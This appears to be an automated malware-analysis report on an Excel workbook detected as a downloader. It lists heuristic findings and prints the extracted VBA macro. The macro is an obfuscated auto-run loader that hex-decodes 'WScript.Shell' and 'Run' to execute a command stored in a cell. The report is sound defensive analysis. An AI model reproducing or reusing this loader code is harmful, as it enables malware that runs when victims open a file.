MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains critical heuristic firings indicating an obfuscated auto-exec VBA loader that uses CreateObject, Shell, and exec sinks. The Workbook_Open macro calls Application.Run with a deobfuscated string that likely points to a payload. The presence of both XLM and VBA macros, along with the ClamAV detection name 'Xls.Downloader.Valyria-6934924-0', strongly suggests a downloader functionality.
Heuristics 8
-
ClamAV: Xls.Downloader.Valyria-6934924-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Valyria-6934924-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 228 bytes |
SHA-256: 962aaf1d57f0a7207e98bd37b3a4cfa339dc6a87bd287090a5d69186204feb4a |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Top ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1197 bytes |
SHA-256: 5c9c9e0a42f11c10f829a3d368cb0b629d634648d46f3aa0f65731488791a9f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub RXWK_()
CallByName CreateObject(ABK_("5E5A6A7970777B355A6F6C7373")), ABK_("597C75"), VbMethod, ABK_(ThisWorkbook.Sheets("Tope").Range("G135").Value), 0, True
End Sub
Private Function TRZU_() As String
ZURVZQIXCVE_ = aSRGASYBCFXU_:ZURVZQIXCVE_ = aSRGASYBCFXU_:EERPOTQMF_(s, 1)SFTXDE_:Select Case SX_: Case Is >= 94: NMQ_ = "RGIFWQ_": Case Is >= 122: CV_ = "ZVEYGY_": Case Is >= 31: FL_ = "MYLDBIA_": Case Else: HDF_ = "JUPOL_": End Select:EERPOTQMF_(s, 1)SFTXDE_:TRZU_ = FOKUNGUL_:
End Function
Private Function ABK_(ByVal A_ As String)
Dim ASZ_(2) As Integer: ASZ_(0) = 38: ASZ_(1) = 72: Dim NHM_ As String: Dim GBK_ As Long: For GBK_ = 1 To Len(A_) Step 2: NHM_ = NHM_ & Chr(Val(Chr(ASZ_(0)) & Chr(ASZ_(1)) & Mid(A_, GBK_, 2)) - 7): Next: ABK_ = NHM_
End Function
Sub Workbook_Open()
Application.Run ABK_("5B6F707A5E7679726976767235595F5E5266")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.